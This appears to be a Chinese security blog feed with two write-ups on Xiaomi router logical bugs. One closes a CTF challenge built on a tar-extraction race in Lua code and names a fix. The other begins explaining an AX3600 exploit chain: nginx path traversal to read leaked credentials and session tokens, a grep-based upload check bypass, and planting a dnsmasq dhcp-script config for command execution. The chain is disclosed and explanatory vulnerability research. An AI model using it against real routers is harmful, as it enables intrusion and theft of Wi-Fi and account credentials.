</span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">TMPDIR</span> <span class="o">=</span> <span class="s2">&#34;bkcfg_tmp&#34;</span> <span class="kr">function</span> <span class="nf">extract</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="kd">local</span> <span class="n">fs</span> <span class="o">=</span> <span class="n">require</span><span class="p">(</span><span class="s2">&#34;nixio.fs&#34;</span><span class="p">)</span> <span class="kd">local</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">filepath</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">tarpath</span> <span class="kr">then</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">TARMBUFILE</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">1</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep ^l &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">b</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep -v .des | grep -v .mbu &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">c</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">22</span> <span class="kr">end</span> <span class="c1">---------------------------------------------------------- &lt;&lt;--- x</span> <span class="kd">local</span> <span class="n">wcl</span> <span class="o">=</span> <span class="n">io.popen</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | wc -l&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="n">tonumber</span><span class="p">(</span><span class="n">wcl</span><span class="p">:</span><span class="n">read</span><span class="p">(</span><span class="s2">&#34;*a&#34;</span><span class="p">))</span> <span class="o">~=</span> <span class="mi">2</span> <span class="kr">then</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="n">wcl</span><span class="p">:</span><span class="n">close</span><span class="p">()</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="n">wcl</span><span class="p">:</span><span class="n">close</span><span class="p">()</span> <span class="c1">----------------------------------------------------------</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;cd /tmp; mkdir &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; cd &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; tar -xzf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">d</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.des&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.1</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.mbu&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.2</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;mv /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/* /tmp; rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">f</span> <span class="kr">return</span> <span class="mi">0</span> <span class="kr">end</span> </code></pre></td></tr></table> </div> </div><p>**(x)**部分的代码检查了上传的压缩包中是否只有两个文件，理论上应该会缓解上一节介绍的非预期解。</p> <p>有了以上的基础，我在这里暂停一下看读者能否发现新版代码中的漏洞。</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/1minute.jpg" alt=""></p> <p>继续分析，当用户上传一个正常的压缩包时，对该压缩包的处理逻辑可以用下图来表示</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/normal.png" alt=""></p> <p>但如果某些检查没有通过(比如压缩包中没有<code>cfg_backup.des</code>)，就会额外有一步<code>rm</code>的操作</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/fail.png" alt=""></p> <p>而多出的这一步<code>rm</code>也就是关键点。让我们思考这样一种情况：当虚拟机同时处理多个请求时，若一个请求中的<code>rm -rf /tmp/bkcfg_tmp</code>刚好发生在另一个请求的<code>cd bkcfg_tmp</code>之前时，因为<code>/tmp/bkcfg_tmp</code>已经不存在了，因此<code>cd</code>会失败，当前请求的CWD仍然是<code>/tmp</code>，整个流程可以用下图来表示</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/race.png" alt=""></p> <p>因此通过文件系统中的条件竞争，攻击者再一次获得了在<code>/tmp</code>目录下上传特定文件的能力，接下来的利用就可以参考上文介绍的方法了。比赛中为了我给了选手大量的试错机会赢得竞争（5分钟*2次机会*5次尝试），但因为所有的队伍都用了非预期解，所以他们都在20秒内就实现了RCE.</p> <p>下图是我的demo截图：</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/demo.png" alt=""></p> <blockquote> <p>修复该漏洞可以使用<code>tar</code>的<code>-C</code>参数</p> </blockquote> <blockquote> <pre><code> -C, --directory=DIR Change to DIR before performing any operations. This option is order-sensitive, i.e. it affects all options that follow. </code></pre> </blockquote> <h2 id="总结">总结</h2> <ol> <li>因为疫情，本届RWCTF没有决赛，期待明年春暖花开后在第4届RWCTF决赛现场看到各位师傅</li> <li>在完全理解代码含义之前，不要盲目的复制&amp;粘贴代码</li> <li>学习历史漏洞可以帮助我们发现新的漏洞</li> </ol> <p>这里我想要感谢MiSRC<!-- raw HTML omitted -->[18]<!-- raw HTML omitted -->允许我使用他们的漏洞出题。我一直认为评判产品是否安全需要看厂商对待漏洞的态度。历史上我们也看到过某些厂商故意忽略或者掩盖他们漏洞的例子。厂商不应该担心安全从业者讨论他们的漏洞，这只会让他们的产品更安全，在这一点上MiSRC做出了一个很积极开放的榜样。</p> <h2 id="reference-1">Reference</h2> <p>[1]. <a href="https://ctftime.org/event/1198">https://ctftime.org/event/1198</a></p> <p>[2]. <a href="https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments/tree/main/router3">https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments/tree/main/router3</a></p> <p>[3]. <a href="https://ctftime.org/team/143448">https://ctftime.org/team/143448</a></p> <p>[4]. <a href="https://blog.bushwhackers.ru/">https://blog.bushwhackers.ru/</a></p> <p>[5]. <a href="https://twitter.com/Sauercl0ud">https://twitter.com/Sauercl0ud</a></p> <p>[6]. <a href="http://openwrt.org/">http://openwrt.org/</a></p> <p>[7]. <a href="https://openwrt.org/docs/guide-user/services/webserver/nginx">https://openwrt.org/docs/guide-user/services/webserver/nginx</a></p> <p>[8]. <a href="https://openwrt.org/docs/techref/luci">https://openwrt.org/docs/techref/luci</a></p> <p>[9]. <a href="http://www.lua.org/">http://www.lua.org/</a></p> <p>[10]. <a href="https://openwrt.org/docs/techref/uci">https://openwrt.org/docs/techref/uci</a></p> <p>[11]. <a href="https://github.com/feicong/lua_re">https://github.com/feicong/lua_re</a></p> <p>[12]. <a href="https://bbs.pediy.com/thread-216969.htm">https://bbs.pediy.com/thread-216969.htm</a></p> <p>[13]. <a href="https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments/tree/main/router3/files/310-rwctf-router3.patch">https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments/tree/main/router3/files/310-rwctf-router3.patch</a></p> <p>[14]. <a href="https://privacy.mi.com/trust#/security/vulnerability-management/vulnerability-announcement/detail?id=15&amp;locale=en">https://privacy.mi.com/trust#/security/vulnerability-management/vulnerability-announcement/detail?id=15&amp;locale=en</a></p> <p>[15]. <a href="https://hitcon.org/2020/slides/Exploit%20(Almost)%20All%20Xiaomi%20Routers%20Using%20Logical%20Bugs.pdf">https://hitcon.org/2020/slides/Exploit%20(Almost)%20All%20Xiaomi%20Routers%20Using%20Logical%20Bugs.pdf</a></p> <p>[16]. <a href="https://github.com/openwrt/luci/wiki/ModulesHowTo#show-me-the-way-the-dispatching-process">https://github.com/openwrt/luci/wiki/ModulesHowTo#show-me-the-way-the-dispatching-process</a></p> <p>[17]. <a href="https://en.wikipedia.org/wiki/Hard_link">https://en.wikipedia.org/wiki/Hard_link</a></p> <p>[18]. <a href="https://sec.xiaomi.com/">https://sec.xiaomi.com/</a></p> https://bash-c.github.io/post/exploiting-ax3600-using-logical-bugs/ Sun, 20 Sep 2020 11:01:14 +0800 https://bash-c.github.io/post/exploiting-ax3600-using-logical-bugs/ <h1 id="实战逻辑漏洞三个漏洞搞定一台路由器二">实战逻辑漏洞：三个漏洞搞定一台路由器（二）</h1> <p>距离 <a href="https://zhuanlan.zhihu.com/p/26271959">实战栈溢出：三个漏洞搞定一台路由器</a> 的发表已有三年。三年来，市面上智能设备的安全性有了肉眼可见的发展，部分领头企业的智能设备在完善的缓解措施保护下已经较难通过内存漏洞完成一整套利用。</p> <p>随着内存漏洞利用难度的增大，更加稳定的逻辑漏洞的优势就凸显了出来。本文中，笔者将分享如何通过多个<strong>逻辑漏洞</strong>，完成对 <a href="https://www.mi.com/r3600">小米AIoT路由器 AX3600</a>（后文简称 AX3600） 的 LAN 口 RCE。本文中对部分专业名词不会做太多详细的解释，需要读者有一定的安全基础。</p> <h2 id="获取固件">获取固件</h2> <p>在 <a href="http://www.miwifi.com/miwifi_download.html">miwifi</a> 官网可以下载到所有小米路由器的固件，本文中分析的固件版本为</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">小米AIoT路由器AX3600 稳定版 版本1.0.20（2020年3月10日更新） </code></pre></td></tr></table> </div> </div><h2 id="一串漏洞来袭">一串漏洞来袭</h2> <h3 id="漏洞一有限的路径穿越漏洞">漏洞一：有限的路径穿越漏洞</h3> <p>从官网下载并解出固件后，通过浏览 AX3600 各种服务的配置文件，很快找到了第一个由于 nginx 误配置导致的路径穿越漏洞</p> <p><img src="../pic/Exploit-AX3600-using-logical-bugs/nginx_conf.png" alt=""></p> <p>如上图所示，当用户使用过配置备份功能后，攻击者访问 <code>http://AX3600-ip/backup/log../test</code> 时，由于 <code>alias</code> 的作用，实际访问的文件为 <code>/tmp/syslogbackup/../test</code> 也即是 <code>/tmp/test</code>，攻击者可以通过实现从 <code>/tmp/syslogbackup</code> 穿越至 <code>/tmp</code> 目录，读取 <code>/tmp</code> 任意文件。</p> <p>经过观察，在 <code>/tmp/messages</code> 文件中保留了较多的敏感信息</p> <p><img src="../pic/Exploit-AX3600-using-logical-bugs/messages.png" alt=""></p> <p>攻击者可以通过访问 <code>http://AX3600-ip/backup/log../messages</code> 读取 <code>/tmp/messages</code> 中的内容，获取明文的 wifi 密码，PPPoE 账号和密码，vpn 用户名和密码，stok 等信息。</p> <p>其中，使用泄露的 stok 可以在一定时间内登录到后台，实现后台登录绕过。</p> <p>这个漏洞的CVE编号是 <a href="https://privacy.mi.com/trust#/security/vulnerability-management/vulnerability-announcement/detail?id=14&amp;locale=zh">CVE-2020-11959</a></p> <h3 id="漏洞二后台解压逻辑错误">漏洞二：后台解压逻辑错误</h3> <p>AX3600 后台存在上传路由器配置文件的功能，用户可以通过上传包含配置文件的 <code>.tar.gz</code> 压缩包来恢复路由器设置 <img src="../pic/Exploit-AX3600-using-logical-bugs/backup.png" alt=""></p> <p>上传后的文件在路由器的 <code>/tmp</code> 目录下被解压，只有合法的文件会被继续处理，不合法的文件报错不再处理，相关的 lua 代码经过整理后如下。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-lua" data-lang="lua"><span class="kr">function</span> <span class="nf">extract</span><span class="p">()</span> <span class="n">require</span> <span class="s2">&#34;nixio.fs&#34;</span> <span class="n">L2_30</span> <span class="o">=</span> <span class="s2">&#34;/tmp/cfgbackup.tar.gz&#34;</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">nixio.fs</span><span class="p">.</span><span class="n">access</span><span class="p">(</span><span class="n">L2_30</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">1</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span> <span class="o">..</span> <span class="s2">&#34; | grep ^l &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span> <span class="o">..</span> <span class="s2">&#34; |grep -v .des|grep -v .mbu &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">22</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;cd /tmp; tar -xzf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span> <span class="o">..</span> <span class="s2">&#34; &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm &#34;</span> <span class="o">..</span> <span class="n">L2_30</span> <span class="o">..</span> <span class="s2">&#34; &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">nixio.fs</span><span class="p">.</span><span class="n">access</span><span class="p">(</span><span class="n">_UPVALUE1_</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">nixio.fs</span><span class="p">.</span><span class="n">access</span><span class="p">(</span><span class="n">_UPVALUE2_</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="kr">return</span> <span class="mi">0</span> <span class="kr">end</span> </code></pre></td></tr></table> </div> </div><p>分析上边的代码，发现检查文件是否合法的部分流程为： 使用 <code>tar -tzvf</code> 列出压缩包中的内容，然后使用 <code>grep</code> 检查压缩包内的文件，检查分两步</p> <ol> <li>使用 <code>grep ^l</code> 判断压缩包内的文件是不是软连接，是的话删除压缩包，函数退出，流程结束</li> <li>使用 <code>grep -v .des | grep -v .mbu</code> 判断压缩包内是否包含且仅包含后缀为 <code>.des</code> 和 <code>.mbu</code> 的两个文件，不满足条件时删除压缩包，函数退出，流程结束</li> </ol> <p>如下图，<code>test.tar.gz</code> 中只有一个 <code>.des</code> 文件，不满足需要同时包含 <code>.mbu</code> 和 <code>.des</code> 文件的限制 <img src="../pic/Exploit-AX3600-using-logical-bugs/des.png" alt=""></p> <p>上传后提示解压失败，不对上传的 <code>.des</code> 文件做进一步处理 <img src="../pic/Exploit-AX3600-using-logical-bugs/error.png" alt=""></p> <p>在解压失败逻辑中，存在一个细微的逻辑问题：<strong>未删除解压后不合法的配置文件</strong>。如上图的例子中，在路由器上解压得到的 <code>test.des</code> 文件虽然没有被进一步处理，但仍然保留在了 <code>/tmp</code> 目录下 <img src="../pic/Exploit-AX3600-using-logical-bugs/still_here.png" alt=""></p> <p>同时因为压缩包可以保留路径信息，用户可以上传保留了路径信息的 <code>.des</code> 或者 <code>.mbu</code> 文件至 <code>/tmp</code> 下的任意路径 <img src="../pic/Exploit-AX3600-using-logical-bugs/new_dir.png" alt=""></p> <p><img src="../pic/Exploit-AX3600-using-logical-bugs/new_dir_.png" alt=""></p> <p>攻击者可以利用这个逻辑缺陷在 <code>/tmp</code> 下写任意后缀为 <code>.mbu</code> 或者 <code>.des</code> 的文件。单独来看，这个问题并不严重，但与下文的逻辑漏洞连用，攻击者可以实现后台的任意命令执行。</p> <p>仔细阅读解压逻辑中判断文件是否为合法的代码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-lua" data-lang="lua"> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span> <span class="o">..</span> <span class="s2">&#34; |grep -v .des|grep -v .mbu &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span> <span class="o">..</span> <span class="n">L2_30</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">22</span> <span class="kr">end</span> </code></pre></td></tr></table> </div> </div><p>判断压缩包中是否包含且只包含 <code>*.des</code> 和 <code>*.mbu</code> 使用了 <code>grep -v</code>，但这样使用 <code>grep</code> 真的能起到预期的效果吗？</p> <p>查看 <code>grep</code> 的 man 手册</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">GREP(1) User Commands GREP(1) NAME grep, egrep, fgrep, rgrep - print lines matching a pattern ...... -v, --invert-match Invert the sense of matching, to select non-matching lines. ...... </code></pre></td></tr></table> </div> </div><p><code>grep</code> 在进行模式匹配时，是以行为单位进行的，如下图，只要整行中包含特定的字符串即可通过 <code>grep</code> 的检查 <img src="../pic/Exploit-AX3600-using-logical-bugs/grep.png" alt=""></p> <p>同时，因为 <code>grep</code> 在模式匹配时使用 <code>.</code> 可以代替任意字符，所以文件名只需包含 <code>mbu</code> 和 <code>des</code> 即可，而不必要必须以 <code>.mbu</code> 或 <code>.des</code> 结尾</p> <p><img src="../pic/Exploit-AX3600-using-logical-bugs/mbu.png" alt=""></p> <p>这也是一个很微小的逻辑漏洞，比起上一步，攻击者能多造成的影响仅仅是可以部分改变上传文件的文件名（从必须是 <code>.des</code> 或 <code>.mbu</code> 后缀改为文件名中包含 <code>des</code> 或 <code>mbu</code> 即可），但从攻击者的角度而言，漏洞的影响已经大大上升了一个等级，如在正常的渗透测试中，上传 <code>.php</code>, <code>.jsp</code> 等可写webshell。</p> <p>但对于 AX3600，攻击者可以控制的文件在 <code>/tmp</code> 下，<code>/tmp</code> 下可选的目标并不多。继续浏览 <code>/tmp</code> 下的文件，发现存在 <code>/tmp/dnsmasq.d</code> 文件夹，分析 <code>dnsmasq</code> 的运行逻辑</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@XiaoQiang:~# ps w <span class="p">|</span> grep dnsmasq <span class="m">3951</span> root <span class="m">1300</span> S /usr/sbin/dnsmasq --user<span class="o">=</span>root -C /var/etc/dnsmasq.conf.cfg01411c -k -x /var/run/dnsmasq/dnsmasq.cfg01411c <span class="m">28237</span> root <span class="m">1336</span> S grep dnsmasq </code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@XiaoQiang:~# cat /var/etc/dnsmasq.conf.cfg01411c <span class="c1"># auto-generated config file from /etc/config/dhcp</span> conf-file<span class="o">=</span>/etc/dnsmasq.conf <span class="nv">address</span><span class="o">=</span>/workforme.stat.localdomain/127.0.0.1 dhcp-authoritative domain-needed localise-queries read-ethers enable-ubus expand-hosts bind-dynamic local-service all-servers <span class="nv">server</span><span class="o">=</span>/lan/ dhcp-leasefile<span class="o">=</span>/tmp/dhcp.leases resolv-file<span class="o">=</span>/tmp/resolv.conf.auto intercept-ip-address<span class="o">=</span>192.168.31.1 intercept-white-list<span class="o">=</span>/etc/intercept_wlist addn-hosts<span class="o">=</span>/tmp/hosts conf-dir<span class="o">=</span>/tmp/dnsmasq.d dhcp-range<span class="o">=</span>set:lan,192.168.31.5,192.168.31.254,255.255.255.0,12h dhcp-option-force<span class="o">=</span>12,MiWiFi-R3600-srv dhcp-option-force<span class="o">=</span>43,miwifi-R3600-1.0.50-101 <span class="nv">address</span><span class="o">=</span>/XiaoQiang/192.168.31.1 ptr-record<span class="o">=</span>1.31.168.192.in-addr.arpa,XiaoQiang root@XiaoQiang:~# </code></pre></td></tr></table> </div> </div><p>可以发现，<code>/tmp/dnsmaq.d</code> 是 <code>dnsmasq</code> 存放配置文件的目录，当 <code>dnsmasq</code> 重启时，<code>conf-dir</code> 中的新配置文件会被加载，当前情况下，只需配置文件后缀是 <code>.conf</code> 即可被加载。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">-7, --conf-dir=&lt;directory&gt;[,&lt;file-extension&gt;......], Read all the files in the given directory as configuration files. If extension(s) are given, any files which end in those extensions are skipped. Any files whose names end in ~ or start with . or start and end with # are always skipped. If the extension starts with * then only files which have that extension are loaded. So --conf-dir=/path/to/dir,*.conf loads all files with the suffix .conf in /path/to/dir. This flag may be given on the command line or in a configuration file. If giving it on the command line, be sure to escape * characters. Files are loaded in alphabetical order of filename. </code></pre></td></tr></table> </div> </div><p>而 <code>dnsmasq</code> 又支持很多特性（限于篇幅，下文只列出部分特性，<code>dnsmasq</code> 的完整配置可以参考文末的链接）</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@XiaoQiang:~# dnsmasq --help Usage: dnsmasq <span class="o">[</span>options<span class="o">]</span> Valid options are: ...... -6, --dhcp-script<span class="o">=</span>&lt;path&gt; Shell script to run on DHCP lease creation and destruction. --dhcp-luascript<span class="o">=</span>path Lua script to run on DHCP lease creation and destruction. --dhcp-scriptuser<span class="o">=</span>&lt;username&gt; Run lease-change scripts as this user. ...... -7, --conf-dir<span class="o">=</span>&lt;path&gt; Read configuration ...... --enable-tftp<span class="o">[=</span>&lt;intr&gt;<span class="o">[</span>,&lt;intr&gt;<span class="o">]]</span> Enable integrated read-only TFTP server. --tftp-root<span class="o">=</span>&lt;dir&gt;<span class="o">[</span>,&lt;iface&gt;<span class="o">]</span> Export files by TFTP only from the specified subtree. --tftp-unique-root<span class="o">[=</span>ip<span class="p">|</span>mac<span class="o">]</span> Add client IP or hardware address to tftp-root. --tftp-secure Allow access only to files owned by the user running dnsmasq. --tftp-no-fail Do not terminate the service <span class="k">if</span> TFTP directories are inaccessible. --tftp-max<span class="o">=</span>&lt;integer&gt; Maximum number of concurrent TFTP transfers <span class="o">(</span>defaults to 50<span class="o">)</span>. --tftp-mtu<span class="o">=</span>&lt;integer&gt; Maximum MTU to use <span class="k">for</span> TFTP transfers. --tftp-no-blocksize Disable the TFTP blocksize extension. --tftp-lowercase Convert TFTP filenames to lowercase --tftp-port-range<span class="o">=</span>&lt;start&gt;,&lt;end&gt; Ephemeral port range <span class="k">for</span> use by TFTP transfers. ...... </code></pre></td></tr></table> </div> </div><p>因此，通过在 <code>/tmp/dnsmasq.d</code> 下上传 <code>dnsmasq</code> 的配置文件完成命令执行就是一个很好的选择了。</p> <p>这里选用通过 <code>dnsmasq</code> 的 <code>dhcp-script</code> 选项完成执行命令。具体方法为：</p> <ol> <li> <p>先在 <code>/tmp</code> 下上传包含攻击者命令的 shell 脚本(文件名包含 des 或者 mbu) <img src="../pic/Exploit-AX3600-using-logical-bugs/sh.png" alt=""></p> </li> <li> <p>再上传 <code>.conf</code> 结尾的 dnsmasq 配置文件至 <code>/tmp/dnsmasq.d</code>（文件名同样包括 des 或者 mbu） <img src="../pic/Exploit-AX3600-using-logical-bugs/conf.png" alt=""> 如下图表示成功上传 <img src="../pic/Exploit-AX3600-using-logical-bugs/upload.png" alt=""></p> </li> <li> <p>重启 dnsmasq，方法有很多，基本所有更改网络状态的操作都可以实现，这里通过开/关 ipv6 支持来实现 <img src="../pic/Exploit-AX3600-using-logical-bugs/dnsmasq.png" alt=""></p> </li> <li> <p>然后通过 tftp 触发 dhcp-script，实现代码执行 <img 